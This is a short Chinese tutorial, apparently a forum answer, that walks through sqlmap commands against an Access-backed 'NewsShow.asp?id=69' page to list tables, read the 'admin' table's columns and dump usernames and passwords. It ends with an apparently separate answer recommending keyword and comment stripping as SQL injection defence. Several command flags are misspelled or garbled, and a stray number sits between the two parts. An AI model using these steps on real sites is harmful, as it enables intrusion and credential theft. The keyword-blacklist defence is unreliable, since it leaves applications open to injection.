sqlmap怎么注入ACCESS数据库

首先我们先来跑表

命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10

最后跑出了用户名。密码

9

我说下过滤原则吧，写起来比较麻烦。

过滤sql关键字select，update,delete，exec等一系列关键字，把他们替换为空，

过滤注释符号‘，--等把他们替换为空。

简单点就直接替换，要想准确替换可以用正则表达式控制。

这些可以写一个公共方法，在拼接前调用后再拼接。

还有就是要考虑你自己拼接的语句，对输入的字符串做长度，内容的检查，以上几点做了应该可以一定程度防止。